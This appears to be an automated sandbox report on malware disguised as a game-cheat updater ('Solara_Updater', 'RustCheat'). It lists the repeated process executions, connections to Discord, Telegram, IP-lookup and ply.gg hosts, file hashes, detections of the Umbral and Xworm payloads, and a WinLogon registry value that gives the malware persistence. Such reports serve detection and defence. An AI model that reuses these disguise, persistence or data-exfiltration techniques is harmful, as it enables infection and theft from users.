cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\hostNet\smss.exe

"C:\hostNet\smss.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2188-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

memory/2188-1-0x0000000001100000-0x00000000012E6000-memory.dmp

memory/2188-6-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

memory/3012-10-0x00000000008E0000-0x000000000090A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/3012-14-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

memory/2188-15-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/3012-51-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

memory/1992-50-0x0000000001270000-0x00000000012B0000-memory.dmp

memory/1808-49-0x0000000000E30000-0x0000000000E46000-memory.dmp

memory/836-63-0x000000001B680000-0x000000001B962000-memory.dmp

memory/836-64-0x0000000001D20000-0x0000000001D28000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 a6a385d15c71f85e4bb2d0f575eb21f0
SHA1 d1ba8b3701bac5ef5285382b4cafa52d92e0779c
SHA256 112ddf676b86e3b98806c99ac573cb16ed0d0e88d3e6b85f9d982a7e876abfd6
SHA512 469340f51565a61eaa5e2427ebe74b633fab328501f7c1dec47b88737339f3443f75d501bcfdb92d2759b6ba752b363025fdcba0154833ecb792545f2daea1be

memory/1776-73-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/1776-76-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2608-99-0x00000000022D0000-0x00000000022D8000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c

memory/1296-221-0x0000000000380000-0x0000000000396000-memory.dmp

memory/2676-222-0x00000000012A0000-0x000000000147E000-memory.dmp

memory/2676-228-0x0000000000600000-0x000000000060E000-memory.dmp

memory/2676-230-0x0000000000630000-0x000000000064C000-memory.dmp

memory/2676-232-0x0000000000650000-0x0000000000668000-memory.dmp

memory/2676-234-0x0000000000610000-0x0000000000618000-memory.dmp

memory/2676-236-0x0000000000620000-0x000000000062C000-memory.dmp

C:\Program Files (x86)\Google\cmd.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/680-295-0x0000000000890000-0x00000000008D0000-memory.dmp

memory/2076-296-0x0000000000BF0000-0x0000000000DCE000-memory.dmp

memory/2660-341-0x0000000002620000-0x0000000002628000-memory.dmp

memory/3004-346-0x000000001B550000-0x000000001B832000-memory.dmp

memory/3004-347-0x0000000001F70000-0x0000000001F78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9SWtAvUg1NoDc9b

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\J32gOpl9AqlVJL6

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

memory/1840-368-0x0000000001F10000-0x0000000001F18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qm9DjhUyYIicg76\Display\Display.png

MD5 22c510c68f47d2d392b168fd63a8ee22
SHA1 a556c157badbc67db2560d7fa0e86472434632c2
SHA256 2723a2a1610f33c82abb9d2ae1335567a7dfc4e23f8247f0f8205086fd3044e7
SHA512 76a89f006c4e8a4daa916b5012ced7a848e28ed01f3ea5a8d89ce2f0923c4c233b37689eebf35230d82fb21d78a1b2c4245354f30f85902dad302803ff3d466a

memory/2556-391-0x0000000000300000-0x0000000000340000-memory.dmp

memory/2852-429-0x0000000000930000-0x0000000000938000-memory.dmp

memory/2308-430-0x0000000000B80000-0x0000000000D5E000-memory.dmp

memory/300-431-0x0000000000C90000-0x0000000000CA6000-memory.dmp

memory/2772-544-0x0000000000CC0000-0x0000000000CC8000-memory.dmp

memory/2068-545-0x0000000000CB0000-0x0000000000CC6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 16:14

Reported

2024-05-19 16:17

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\hostNet\\RuntimeBroker.exe\", \"C:\\hostNet\\sppsvc.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
